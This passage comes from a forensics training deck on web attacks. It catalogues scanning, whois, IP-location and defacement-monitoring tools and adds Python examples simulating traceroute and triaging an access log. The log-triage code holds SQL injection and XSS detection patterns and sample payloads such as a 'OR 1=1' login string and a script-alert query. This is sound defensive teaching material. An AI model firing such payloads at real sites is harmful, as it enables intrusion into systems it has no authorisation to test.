  • 69. Web Attack Investigation Tools (cont’d) Paros is a Java-based web application security assessment tool used to intercept and modify all HTTP and HTTPS data between the server and the client, including cookies and form fields. HP WebInspect performs web application security testing and assessment
  • 70. Web Attack Investigation Tools (cont’d) KeepNI keeps an eye on the website’s functionality and ensures that your site is up and fully functional at all times. Wikto checks for flaws in web servers and also offers web-based vulnerability scanning
  • 71. Web Attack Investigation Tools (cont’d) Mapper maps the files, file parameters, and values of any site you wish to test: you browse the site as a normal user while recording the session with Achilles (Mapper supports other proxies as well), then run Mapper on the resulting log file. N-Stalker, a web application security scanner, offers a complete suite of web security assessment checks to enhance the overall security of web applications against vulnerabilities and attacks
  • 72. Web Attack Investigation Tools (cont’d) Scrawlr is an HP tool that crawls a website and audits it for SQL Injection vulnerabilities. Exploit-Me is a suite of Firefox web application security testing tools that integrates directly with Firefox and tests for vulnerabilities in web applications
  • 73. Web Attack Investigation Tools (cont’d) WebAgain protects a website and automatically repairs content damaged by attackers. UV Uptime Website Defacement Detector detects defacement of a website
  • 74. Tools for Locating IP Address
  • 75. Tools for Locating IP Address Hide Real IP is a tool used to hide the IP address for anonymous Internet access; a fake IP address appears instead of the real one. whatismyip is a tool to recognize the real Internet IP address
  • 76. Tools for Locating IP Address (cont’d) IP Detective Suite is an IP monitoring program that reports a changing IP address to the user’s FTP site or to an e-mail address. Enterprise IP-Address Manager is an application for assigning, cataloging, and maintaining IP addresses and host data for both registered and private TCP/IP addressed networks
  • 77. Tools for Locating IP Address (cont’d) Whois Lookup is an online tool for obtaining information about any website. SmartWhois is a useful network information utility that allows you to look up all the available information about an IP address, hostname, or domain
  • 78. Tools for Locating IP Address (cont’d) ActiveWhois is a network tool to find any information about an IP address or Internet domain. LanWhois is a program that helps you find out who registered the domain or site you are interested in, and where and when it was registered
  • 79. Nslookup Nslookup is a program to query Internet domain name servers. It displays information that can be used to diagnose Domain Name System (DNS) infrastructure. It helps to find additional IP addresses if the authoritative DNS server is known from whois. The MX record reveals the IP of the mail server. Both Unix and Windows come with an Nslookup client. Third-party clients are also available, e.g., Sam Spade
  • 80. Nslookup: Screenshot
  • 81. Traceroute http://www.traceroute.org/ Traceroute works by exploiting a feature of the Internet Protocol called TTL, or Time To Live. It reveals the path IP packets travel between two systems by sending out consecutive UDP packets with ever-increasing TTLs. As each router processes an IP packet, it decrements the TTL; when the TTL reaches zero, the router sends back a "TTL exceeded" message (using ICMP) to the originator. Routers with DNS entries reveal the name of the router, its network affiliation, and its geographic location
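The TTL mechanism described on this slide, as an added simulation that is not part of the EC-Council material: routers decrement the TTL of each probe, the one that brings it to zero answers with ICMP "time exceeded", and the destination's closed UDP port answers with "port unreachable". The path, addresses and reverse-DNS names are constructed for illustration.

```python
from typing import Dict, List, Optional, Tuple

# Constructed topology: each router has an address and may be configured not to
# answer probes at all, which traceroute renders as "*".
Router = Tuple[str, bool]  # (ip, replies_with_icmp)

def send_probe(hops: List[Router], destination: str, ttl: int) -> Tuple[str, Optional[str]]:
    """Forward one UDP probe carrying the given TTL along the path.

    Every router decrements the TTL. The router that brings it to zero discards
    the packet and (if it is not filtering ICMP) returns "time exceeded" to the
    originator. A probe that survives all routers reaches the destination, whose
    closed UDP port answers "port unreachable", which tells traceroute to stop.
    """
    for ip, replies in hops:
        ttl -= 1
        if ttl == 0:
            return ("time_exceeded", ip) if replies else ("timeout", None)
    return ("port_unreachable", destination)

def traceroute(hops: List[Router], destination: str, rdns: Dict[str, str],
               max_hops: int = 30) -> List[str]:
    """Send probes with TTL 1, 2, 3, ... and record who answered each one."""
    lines = []
    for ttl in range(1, max_hops + 1):
        kind, ip = send_probe(hops, destination, ttl)
        if ip is None:
            lines.append(f"{ttl:2d}  *")                       # no reply: filtered hop
        else:
            lines.append(f"{ttl:2d}  {rdns.get(ip, ip)} ({ip})")  # name, if a PTR exists
        if kind == "port_unreachable":
            break
    return lines

# Constructed sample path: the second router filters ICMP and never answers.
SAMPLE_HOPS = [("192.0.2.1", True), ("198.51.100.9", False), ("203.0.113.254", True)]
SAMPLE_DEST = "203.0.113.80"
# Constructed reverse-DNS entries; the names hint at operator and city, as the slide notes.
SAMPLE_RDNS = {"192.0.2.1": "gw.example-isp.net",
               "203.0.113.254": "core1.lon.example-isp.net"}

if __name__ == "__main__":
    print("\n".join(traceroute(SAMPLE_HOPS, SAMPLE_DEST, SAMPLE_RDNS)))
```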
  • 82. Tools for Locating IP Address: NeoTrace (now McAfee Visual Trace) NeoTrace shows the traceroute output visually: map view, node view, and IP view
  • 83. Whois http://www.whois.net/ Whois is the client utility that communicates with WHOIS servers located around the world to obtain information about domain registration. It supports IP address queries and automatically selects the appropriate Whois server for IP addresses
  • 84. Whois
    Registrant:
    targetcompany (targetcompany-DOM)
    # Street Address
    City, Province
    State, Pin, Country
    Domain Name: targetcompany.COM
    Domain servers in listed order:
    NS1.WEBHOST.COM XXX.XXX.XXX.XXX
    NS2.WEBHOST.COM XXX.XXX.XXX.XXX
    Administrative Contact:
    Surname, Name (SNIDNo-ORG) targetcompany@domain.com
    targetcompany (targetcompany-DOM)
    # Street Address
    City, Province, State, Pin, Country
    Telephone: XXXXX Fax XXXXX
    Technical Contact:
    Surname, Name (SNIDNo-ORG) targetcompany@domain.com
    targetcompany (targetcompany-DOM)
    # Street Address
    City, Province, State, Pin, Country
    Telephone: XXXXX Fax XXXXX
  • 85. CountryWhois http://www.tamos.com/ CountryWhois is a utility for identifying the geographic location of an IP address. It is similar to SmartWhois, but the focus is on IP-to-country identification. Features: • It analyzes server logs • It checks email headers • It identifies online credit card fraud
  • 86. CountryWhois: Screenshot
  • 87. IP2country http://www.ip2country.org/ IP2country identifies a visitor's geographical location, i.e., country, region, city, and ISP, using a proprietary IP address lookup database. Features: • Real-time IP geo-location detection • Redirects web pages based on geographical region • Fraud detection (credit card fraud etc.) • Web log statistics and analysis • Spam filtering
  • 88. IP2country: Screenshot
  • 89. CallerIP http://www.callerippro.com/ CallerIP helps the user to see when someone has connected to your computer and can report the IP address. It also runs a trace on that IP address. Features: • It offers real-time connection monitoring • It identifies the country of origin for all connections made to your machine • It provides worldwide Whois reports for any monitored connection
  • 90. CallerIP: Screenshot 1
  • 91. http://www.whois.net/ Whois.net is an online tool for gaining information about any site
  • 92. Pandora FMS http://pandorafms.org/ Pandora FMS is open source monitoring software. Features: • It watches your systems and applications • It allows you to know the status of any element of those systems. Pandora FMS detects: • Defacement of the website • Whether a network interface is down • Memory leaks in the server application
  • 93. Pandora FMS: Screenshot
  • 94. CounterStorm-1: Defense Against Known, Zero Day, and Targeted Attacks The CounterStorm-1 suite of network security appliances offers the most effective defense against known, zero-day, and targeted attacks. It automatically neutralizes attacks within seconds, preventing costly and widespread damage. It does not require signatures; CounterStorm-1 accurately detects attacks in all IP traffic (TCP, UDP, and ICMP). It recognizes current attacks and automatically adjusts to future threats http://www.counterstorm.com
  • 95. Summary Cross Site Scripting (XSS or CSS) is considered an application-layer hacking technique. SQL Injection means passing SQL code into an application that was not created by the developer. Cookie Poisoning is the process of tampering with the value of cookies. The source, nature, and time of the attack can be determined by analyzing the log files of the compromised system. FTP server vulnerabilities allow an attacker to directly compromise the system hosting the FTP server. Web page defacement requires write access privileges in the web server root directory. Intrusion Detection is the art of detecting inappropriate, incorrect, or anomalous activity
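The summary's point that the source, nature and time of an attack can be recovered from the compromised system's log files, and the access-log analyzers listed on slides 63 to 65, as an added example that is not part of the EC-Council material: a first-pass triage of an Apache/NCSA combined-format access log that URL-decodes each request and flags the two attack classes the module names, SQL injection and cross-site scripting. The log lines and addresses are constructed; the indicator patterns are a minimal illustrative set, not a complete ruleset.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Apache/NCSA "combined" log format: client, identity, user, time, request, status,
# size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Illustrative indicators for the attack classes covered by the module. They are
# applied to the URL-decoded request, so %27 / %3C style encoding does not hide them.
PATTERNS = {
    "sql_injection": re.compile(r"""['"]\s*(or|and)\s+\d+\s*=\s*\d+|union\s+select|--\s*$""", re.I),
    "xss": re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I),
}

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(path: str) -> Optional[str]:
    """Return the attack class whose indicator matches the decoded request, if any."""
    decoded = unquote(unquote(path))  # decode twice: double-encoded payloads are common
    for name, pattern in PATTERNS.items():
        if pattern.search(decoded):
            return name
    return None

def triage(log_text: str) -> List[Dict[str, str]]:
    """Return, per suspicious request, the time, source, nature and status to investigate."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        kind = classify(entry["path"]) if entry else None
        if kind:
            findings.append({"time": entry["time"], "source": entry["ip"], "nature": kind,
                             "request": entry["path"], "status": entry["status"]})
    return findings

# Constructed sample log: two ordinary requests interleaved with two suspicious ones.
SAMPLE_LOG = """\
198.51.100.7 - - [04/Oct/2006:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Oct/2006:10:12:09 +0000] "GET /login.php?user=admin%27%20OR%201%3D1-- HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Oct/2006:10:12:20 +0000] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Oct/2006:10:12:31 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""
```

Running `triage(SAMPLE_LOG)` yields two findings, both from 203.0.113.5, with the timestamps giving the order in which the probing happened.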